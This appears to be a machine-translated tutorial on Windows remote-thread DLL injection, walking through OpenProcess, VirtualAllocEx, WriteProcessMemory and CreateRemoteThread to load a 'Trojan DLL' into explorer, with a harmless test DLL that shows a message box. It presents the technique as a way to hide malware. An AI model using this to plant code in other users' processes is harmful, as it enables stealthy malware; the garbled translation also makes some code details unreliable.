Remote thread technology refers to the process's memory address space by creating a remote thread in another process. We know that in the process, we can use the createthread function to create a thread. The new thread and the main thread are created (that is, the thread automatically created when the process starts) shared address space and other resources. But few people know that using createremotethread can also create a new thread in another process. The created remote thread can also share the remote process (Remote Process !) So, in fact, we enter the memory address space of the remote process through a remote thread, and we also have the permissions of the remote process. For example, if you start a DLL Trojan inside a remote process (starting a DLL Trojan is a trivial matter compared to entering the process, we can actually tamper with the data of that remote process at will ).
First, we use OpenProcess to open the process we are trying to embed (if the remote process is not allowed to open, the embedding will fail, which is often caused by insufficient permissions, the solution is to improve the local process permissions through various channels)
Hremoteprocess = OpenProcess (process_create_thread | file: // allow remote thread Creation
Process_vm_operation | file: // allows remote VM operations
Process_vm_write, // allow remote VM write
False, dwremoteprocessid)
Because we need to write the memory address space of the remote process and establish a remote thread, we need to apply for sufficient permissions (process_create_thread, vm_operation, vm_write ).
Then, we can create the loadlibraryw function thread to start our DLL Trojan. The loadlibraryw function is defined in kernel32.dll and is used to load the DLL file. It has only one parameter, is the absolute path name of the DLL file pszlibfilename (that is, the full path File Name of the trojan dll), but because the trojan dll is called in a remote process, so we need to copy the file name to the remote address space first: (otherwise, the remote thread cannot read this parameter)
File: // the memory space required to calculate the dll path name Int cb = (1 + lstrlenw (pszlibfilename) * sizeof (wchar ); File: // use the virtualallocex function to allocate the DLL file name buffer in the memory address space of the remote process. Pszlibfileremote = (pwstr) virtualallocex (hremoteprocess, null, CB, Mem_commit, page_readwrite ); File: // use the writeprocessmemory function to copy the dll path name to the memory space of the remote process. Ireturncode = writeprocessmemory (hremoteprocess, Pszlibfileremote, (pvoid) pszlibfilename, CB, null ); File: // calculate the loadlibraryw entry address Pthread_start_routine pfnstartaddr = (pthread_start_routine) Getprocaddress (getmodulehandle (text ("Kernel32"), "loadlibraryw "); |
Everything is ready. We established the address pfnstartaddr (actually the entry address of loadlibraryw) for the remote thread and passed the parameter pszlibfileremote (actually the full path File Name of the trojan dll we copied) start our trojan dll in a remote process:
File: // start the remote thread loadlibraryw and call the user's DLL file through the remote thread Hremotethread = createremotethread (hremoteprocess, null, 0, Pfnstartaddr, pszlibfileremote, 0, null ); |
So far, remote embedding has been successfully completed. to test whether our DLL is running properly in a remote thread, I have compiled the following test dll:
Bool apientry dllmain (handle hmodule, DWORD reason, lpvoid lpreserved) { Char szprocessid [64]; Switch (reason) { Case dll_process_attach: { File: // get the ID of the current process _ ITOA (getcurrentprocessid (), szprocessid, 10 ); MessageBox (null, szprocessid, "remotedll", mb_ OK ); } Default: Return true; } } |
When I use the rmtdll.exeprogram to embed this testdll.dllinto the assumer.exe process (pid = 1208), the test dll will pop up a confirmation box with the words 1208, And the PS tool will also be able to see
Process ID: 1208 C:/winnt/assumer.exe (0x00400000) ...... C:/testdll. dll (0x100000000) ...... |
This proves that testdll.dllhas been correctly executed in the assumer.exe process.
Whether using a trojan dll or a remote thread, the core code of the Trojan is run in the memory space of other processes. This not only hides itself well, but also protects itself better.